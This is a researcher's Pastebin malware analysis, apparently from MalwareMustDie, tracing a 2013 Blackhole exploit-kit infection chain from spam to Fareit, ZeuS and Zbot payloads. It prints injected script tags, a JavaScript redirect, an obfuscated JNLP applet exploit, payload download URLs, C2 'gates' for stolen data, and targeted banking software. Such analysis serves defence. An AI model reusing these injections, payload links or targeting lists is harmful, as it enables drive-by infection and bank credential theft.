Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie! The Blackhole infection
- // via Incoming FAX Report Spam
- // Same method of infection as: previous post http://malwaremustdie.blogspot.jp/2013/09/how-greedy-cyber-scums-are-leaked-plan.html
- // No Medfos found this time, A zbot Agent/downloader grabbed.
- // Sample: http://www.mediafire.com/?6p5al38dlxdlchr
- // @unixfreaxjp ~]$ date
- // Thu Sep 19 21:22:54 JST 2013
- --2013-09-19 18:59:58-- h00p://oakadventures.com/widow/index.html
- Resolving oakadventures.com... seconds 0.00, 50.63.73.1
- Caching oakadventures.com => 50.63.73.1
- Connecting to oakadventures.com|50.63.73.1|:80... seconds 0.00, connected.
- :
- GET /widow/index.html HTTP/1.0
- Host: oakadventures.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Date: Thu, 19 Sep 2013 10:00:01 GMT
- Server: Apache
- Accept-Ranges: bytes
- Vary: Accept-Encoding
- Content-Length: 442
- Keep-Alive: timeout=5, max=100
- Connection: Keep-Alive
- Content-Type: text/html
- :
- 200 OK
- Length: 442 [text/html]
- Saving to: `index.html'
- 2013-09-19 18:59:59 (14.5 MB/s) - `index.html' saved [442/442]
- // cat...
- <script type="text/javascript" src="h00p://0068421.netsolhost.com/partisanship/poached.js"></script>
- <script type="text/javascript" src="h00p://ade-data.com/exuded/midyear.js"></script>
- <script type="text/javascript" src="h00p://fangstudios.com/macedonian/piles.js"></script>
- --2013-09-19 19:01:57-- h00p://0068421.netsolhost.com/partisanship/poached.js
- Resolving 0068421.netsolhost.com... seconds 0.00, 206.188.192.64
- Caching 0068421.netsolhost.com => 206.188.192.64
- Connecting to 0068421.netsolhost.com|206.188.192.64|:80... seconds 0.00, connected.
- :
- GET /partisanship/poached.js HTTP/1.0
- Referer: malwaremustdie.org
- Host: 0068421.netsolhost.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Date: Thu, 19 Sep 2013 10:01:57 GMT
- Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
- Last-Modified: Thu, 19 Sep 2013 10:00:12 GMT
- ETag: "e84aac-47-4e6b99ea839fb"
- Accept-Ranges: bytes
- Content-Length: 71
- Keep-Alive: timeout=3, max=200
- Connection: Keep-Alive
- Content-Type: application/javascript
- :
- 200 OK
- Length: 71 [application/javascript]
- Saving to: `poached.js'
- 2013-09-19 19:01:58 (2.02 MB/s) - `poached.js' saved [71/71]
- // cat...
- document.location='h00p://louievozza.com/topic/seconds-exist-foot.php';
- // ZA LANDING PAGE ..
- --2013-09-19 19:03:48-- h00p://louievozza.com/topic/seconds-exist-foot.php
- Resolving louievozza.com... seconds 0.00, 174.140.169.145
- Caching louievozza.com => 174.140.169.145
- Connecting to louievozza.com|174.140.169.145|:80... seconds 0.00, connected.
- :
- GET /topic/seconds-exist-foot.php HTTP/1.0
- Referer: malwaremustdie.org
- Host: louievozza.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Server: nginx/0.7.67
- Date: Thu, 19 Sep 2013 10:03:47 GMT
- Content-Type: text/html
- Connection: close
- X-Powered-By: PHP/5.3.14-1~dotdeb.0
- :
- 200 OK
- Length: unspecified [text/html]
- Saving to: `seconds-exist-foot.php'
- 2013-09-19 19:03:51 (44.2 KB/s) - `seconds-exist-foot.php' saved [69693]
- // Had three exploitation...see pic,
- // JNLP goes here:
- <applet width=\"1\" height=\"1\"><param name=\"jnlp_href\" value=\"!G28!!1bbaI.jnlp\"/><PA
- RAM name=\"jnlp_embedded\" value=\"PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gDQo
- 8am5scCBzcGVjPSIxLjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPiANCjxpbmZvcm1hdGlvbj4gDQo8d
- Gl0bGU+Sk5MUDwvdGl0bGU+IA0KPHZlbmRvcj5KTkxQPC92ZW5kb3I+IA0KPGRlc2NyaXB0aW9uPkpOTFA8L2Rlc2N
- yaXB0aW9uPiANCjxvZmZsaW5lLWFsbG93ZWQvPiANCjwvaW5mb3JtYXRpb24+IA0KPHJlc291cmNlcz4gDQoJPGoyc
- 2UgdmVyc2lvbj0iMS42KyIgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hdXRvZGwvajJzZSIvPiA
- NCgk8amFyIGhyZWY9Ii90b3BpYy9zZWNvbmRzLWV4aXN0LWZvb3QucGhwPzN3ITBfXz04VkN4aTV4JjghTV8hbVItN
- SoyNFNMPUQqXzU2IiBtYWluPSJ0cnVlIi8+IA0KPC9yZXNvdXJjZXM+IA0KPGFwcGxldC1kZXNjIG5hbWU9IkpuIiB
- tYWluLWNsYXNzPSJNYWluIiB3aWR0aD0iMiIgaGVpZ2h0PSIyIj4NCiA8cGFyYW0gdmFsdWU9InRydWUiIG5hbWU9I
- l9fYXBwbGV0X3Nzdl92YWxpZGF0ZWQiPjwvcGFyYW0+IA0KPC9hcHBsZXQtZGVzYz4gDQo8L2pubHA+\"/><param
- name=\"prime\" value=\"iym.ttyw3D3x6NNmmZ8N0Dmcb_c_MrMr%_?RK2ifchb_%_rre_BrVrcre_V
- re_BR4=cLGE9rLSb__RP6&r4yB8fJbrpmU5_8#RqNcmbNhvpL1ahfYuPhOODyy3Ojj-tK8evtUUVw%t0jyt38&
- #37;jie%toMimek8iym.ttyw3D3x5s6L1M6b_c_MrMr%_?RXaNfrb___B__r%rV_c_r_M_B__Rvs4m
- sU/=Bb__RcKfBJ1NThLbI6AfzdLPrP-RNif64mzobPDNF%Ai\"></param><param value=\"Dyy3Ojj-tK8e
- vtUUVw%t0jyt38%jie%toMimek8\" name=\"val\"/><param name=\"duFJfXw\" value=\"ht
- tp://louievozza.com/topic/seconds-exist-foot.php?1__--Mi_m*h-9=w9wd8d8cwb&uKs092=wcw88ew78
- a898ewa8ew7&5H94!FCN84y=ww&61U85*t7i0I=8Q-zVw*iX&k_9!-=_2vQ!43R20LB62::h00p://louievozza.c
- om/topic/seconds-exist-foot.php?V!G1!43d1=w9wd8d8cwb&OR_*08!=www7ww8c8aw9w8wdw7ww&v!*G5-*G
- zTH7=ww&9u0!7I*3_P!24=W1g*0DS468*!6l&_!s015-D!n=6h_(qcgs!\"></param></applet>";
- //Non-JNLP goes here:
- "h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56\"
- "h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56\"
- --2013-09-19 19:26:21-- h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56
- Resolving louievozza.com... seconds 0.00, 174.140.169.145
- Caching louievozza.com => 174.140.169.145
- Connecting to louievozza.com|174.140.169.145|:80... seconds 0.00, connected.
- :
- GET /topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56 HTTP/1.0
- Referer: malwareMUSTdie.org
- Host: louievozza.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Server: nginx/0.7.67
- Date: Thu, 19 Sep 2013 10:26:20 GMT
- Content-Type: application/java-archive
- Connection: keep-alive
- Content-Length: 30699
- X-Powered-By: PHP/5.3.14-1~dotdeb.0
- ETag: "71c92ebc2a889d3541ff6f20b4740868"
- Last-Modified: Thu, 19 Sep 2013 10:26:19 GMT
- Accept-Ranges: bytes
- :
- 200 OK
- Registered socket 1896 for persistent reuse.
- Length: 30699 (30K) [application/java-archive]
- Saving to: `java1.jar'
- 3-09-19 19:26:24 (36.4 KB/s) - `java1.jar' saved [30699/30699]
- // Is a CVE-2013-0422... I saw this before...where? hmm..
- // getMBeanInstantiator
- // com.sun.jmx.mbeanserver.Introspector
- // javax.management.MbeanServerDelegateboolean
- // com.sun.jmx.mbeanserver.JmxMBeanServer
- // newMBeanServer
- // :
- // ah.. the same as previous findings (Doh!)
- // Link: http://malwaremustdie.blogspot.jp/2013/09/how-greedy-cyber-scums-are-leaked-plan.html
- //To make long story short...payload:
- h00p://louievozza.com/adobe/update_flash_player.exe
- GET /adobe/update_flash_player.exe HTTP/1.0
- Referer: malwaremustdie.org
- Host: louievozza.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Server: nginx/0.7.67
- Date: Thu, 19 Sep 2013 10:30:55 GMT
- Content-Type: application/octet-stream
- Connection: keep-alive
- Content-Length: 113664
- Last-Modified: Thu, 19 Sep 2013 10:30:01 GMT
- Accept-Ranges: bytes
- :
- 200 OK
- Registered socket 1896 for persistent reuse.
- Length: 113664 (111K) [application/octet-stream]
- Saving to: `update_flash_player.exe'
- 2013-09-19 19:31:00 (50.8 KB/s) - `update_flash_player.exe' saved [113664/113664]
- // This is the usual Win32/Fareit
- VT: https://www.virustotal.com/en/file/7765902c6023647365c4f471c6eeb4d4bfd2e26b759c092135d138f4365c696d/analysis/1379589491/
- SHA256: 7765902c6023647365c4f471c6eeb4d4bfd2e26b759c092135d138f4365c696d
- SHA1: 5e7a2032fea221beae9d509f92061ab0f1ae6578
- MD5: c08233e8051214fd65db330ca8b9dd6c
- File size: 111.0 KB ( 113664 bytes )
- File name: sample1.exe
- File type: Win32 EXE
- Detection ratio: 14 / 48
- Analysis date: 2013-09-19 11:18:11 UTC ( 0 minutes ago )
- The gates to post the steals..
- h00p://louievozza.com/forum/viewtopic.php
- h00p://louvozza.com/forum/viewtopic.php
- h00p://lv-contracting.com/forum/viewtopic.php
- h00p://lvconcordecontracting.com/forum/viewtopic.php
- The download for others..
- h00p://arya-foundation.de/6Zt.exe
- h00p://jaycees.co.uk/zHHgp2.exe
- h00p://familiapaixao.coconet-us.com/tmMTo.exe
- h00p://www.maschinen.be/gMYiQdv.exe
- // The ZeuS Gameover...(downloaded by Fareit)
- URL: https://www.virustotal.com/en/file/a8757588dc0fa034fd94c8a682eeb401b02180c90f8cd5e9ade63fc03823cce9/analysis/1379589455/
- SHA256: a8757588dc0fa034fd94c8a682eeb401b02180c90f8cd5e9ade63fc03823cce9
- SHA1: 61ce0ab07b794de746755a5bb1b53fc079c62b19
- MD5: 674b386f0cb0acec8ea8af4cd7c431c6
- File size: 300.5 KB ( 307712 bytes )
- File name: oqxub.exe
- File type: Win32 EXE
- Detection ratio: 9 / 48
- Analysis date: 2013-09-19 11:17:35 UTC ( 0 minutes ago )
- target injections:
- launchpadshell.exe
- dirclt32.exe
- wtng.exe
- prologue.exe
- pcsws.exe
- fdmaster.exe
- // brute logins..
- bancline
- fidelity
- micrsolv
- bankman
- vantiv
- episys
- jack henry
- cruisenet
- gplusmain
- // Zbot Trojan/Agent..
- URL: https://www.virustotal.com/en/file/efc0f51ba94a496de612bc8431d169720b47df01d21958834156af1c3d7cf589/analysis/1379589429/
- SHA256: efc0f51ba94a496de612bc8431d169720b47df01d21958834156af1c3d7cf589
- SHA1: 24ee0efe80d4ddb5e5559df79aacd35f41e56f88
- MD5: 5b95cc82cbec4f5705c10d13d59874a6
- File size: 43.0 KB ( 44078 bytes )
- File name: ydYGTvG.exe
- File type: Win32 EXE
- Detection ratio: 20 / 48
- Analysis date: 2013-09-19 11:17:09 UTC ( 0 minutes ago )
- Reg: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders
- Downloaded (driver)
- File name IvrufsinNomz.dll
- File Size 13824 bytes
- File Type PE32 (DLL) (GUI) x386
- MD5 b9bc7440d733e4346d45011ea649c6e4
- Connection:
- YAhoO.Com 98.139.183.24
- mta6.am0.yahoodns.net 66.196.118.34
- HOtMaIl.cOM 157.55.152.112
- mx2.HOtMaIl.cOM 65.55.37.104
- ---
- #MalwareMUSTDiee!!!
- @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement